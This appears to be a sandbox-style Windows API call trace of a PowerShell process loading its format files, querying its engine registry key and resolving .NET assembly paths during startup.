	[0347.580] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.580] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.580] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.580] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.581] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.581] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x9e2, lpOverlapped=0x0) returned 1
	[0347.581] ReadFile (in: hFile=0x304, lpBuffer=0x31e1622, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e1622*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0347.581] ReadFile (in: hFile=0x304, lpBuffer=0x31e20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x31e20d8*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0347.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.581] SetErrorMode (uMode=0x1) returned 0x1
	[0347.581] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0347.582] SetErrorMode (uMode=0x1) returned 0x1
	[0347.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.582] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x304) returned 0x0
	[0347.582] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0347.582] CoTaskMemAlloc (cb=0x5a) returned 0x359960
	[0347.582] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x359960, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0347.582] CoTaskMemFree (pv=0x359960) 
	[0347.582] RegCloseKey (hKey=0x304) returned 0x0
	[0347.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.586] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x6a9c179e, Data2=0x2c3, Data3=0x4175, Data4=([0]=0xb6, [1]=0x75, [2]=0x3a, [3]=0x59, [4]=0x58, [5]=0xc0, [6]=0x39, [7]=0xa4))) returned 0x0
	[0347.954] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x69cfd494, Data2=0x87a8, Data3=0x4428, Data4=([0]=0xaf, [1]=0x20, [2]=0x1b, [3]=0x79, [4]=0xcb, [5]=0x7a, [6]=0x34, [7]=0xf3))) returned 0x0
	[0347.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0347.956] SetErrorMode (uMode=0x1) returned 0x1
	[0347.956] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0347.956] GetFileType (hFile=0x304) returned 0x1
	[0347.956] SetErrorMode (uMode=0x1) returned 0x1
	[0347.956] GetFileType (hFile=0x304) returned 0x1
	[0347.956] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.957] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.957] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.957] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.958] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.958] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0xfb2, lpOverlapped=0x0) returned 1
	[0347.958] ReadFile (in: hFile=0x304, lpBuffer=0x320c35a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320c35a*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0347.958] ReadFile (in: hFile=0x304, lpBuffer=0x320cc40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x320cc40*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0347.959] CloseHandle (hObject=0x304) returned 1
	[0347.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0347.959] SetErrorMode (uMode=0x1) returned 0x1
	[0347.959] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0347.959] SetErrorMode (uMode=0x1) returned 0x1
	[0347.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0347.959] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x304) returned 0x0
	[0347.959] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0347.960] CoTaskMemAlloc (cb=0x5a) returned 0x359110
	[0347.960] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x359110, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0347.960] CoTaskMemFree (pv=0x359110) 
	[0347.960] RegCloseKey (hKey=0x304) returned 0x0
	[0347.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0347.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0347.962] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x53826edc, Data2=0x9222, Data3=0x41c7, Data4=([0]=0xb1, [1]=0x96, [2]=0xde, [3]=0x2d, [4]=0xd7, [5]=0x30, [6]=0x3c, [7]=0x30))) returned 0x0
	[0347.963] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4b5cb73a, Data2=0x78f2, Data3=0x4a52, Data4=([0]=0xb0, [1]=0xb0, [2]=0xcb, [3]=0x68, [4]=0xb8, [5]=0xfa, [6]=0xcf, [7]=0x99))) returned 0x0
	[0347.963] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x728c985b, Data2=0x53ed, Data3=0x4569, Data4=([0]=0x83, [1]=0xd2, [2]=0x19, [3]=0x8c, [4]=0xe0, [5]=0xf, [6]=0xab, [7]=0x8b))) returned 0x0
	[0347.963] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x1ce98e38, Data2=0x9da2, Data3=0x4263, Data4=([0]=0xa0, [1]=0x60, [2]=0xa, [3]=0xc5, [4]=0xd, [5]=0x2, [6]=0xfb, [7]=0xf4))) returned 0x0
	[0347.963] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x330d597, Data2=0xe279, Data3=0x40b0, Data4=([0]=0x9e, [1]=0xf0, [2]=0xa7, [3]=0xcf, [4]=0xaa, [5]=0x5c, [6]=0xe3, [7]=0x73))) returned 0x0
	[0347.964] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x14af3b2b, Data2=0xb775, Data3=0x42ea, Data4=([0]=0x90, [1]=0x71, [2]=0x4e, [3]=0x3e, [4]=0xf2, [5]=0x3c, [6]=0xb2, [7]=0xe8))) returned 0x0
	[0347.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.964] SetErrorMode (uMode=0x1) returned 0x1
	[0347.964] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0347.964] GetFileType (hFile=0x304) returned 0x1
	[0347.964] SetErrorMode (uMode=0x1) returned 0x1
	[0347.964] GetFileType (hFile=0x304) returned 0x1
	[0347.964] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.965] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.966] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.966] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.966] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.967] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0347.967] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0xaca, lpOverlapped=0x0) returned 1
	[0347.967] ReadFile (in: hFile=0x304, lpBuffer=0x3257fd2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3257fd2*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0347.967] ReadFile (in: hFile=0x304, lpBuffer=0x32589a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x32589a0*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0347.967] CloseHandle (hObject=0x304) returned 1
	[0347.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.967] SetErrorMode (uMode=0x1) returned 0x1
	[0347.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0347.968] SetErrorMode (uMode=0x1) returned 0x1
	[0347.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.968] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x304) returned 0x0
	[0347.968] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0347.968] CoTaskMemAlloc (cb=0x5a) returned 0x359110
	[0347.968] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x359110, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0347.968] CoTaskMemFree (pv=0x359110) 
	[0347.968] RegCloseKey (hKey=0x304) returned 0x0
	[0347.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0347.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0347.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0347.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0347.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0348.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0348.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0348.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0348.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0348.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0348.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0348.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0348.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0348.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0348.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0348.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0348.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0348.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
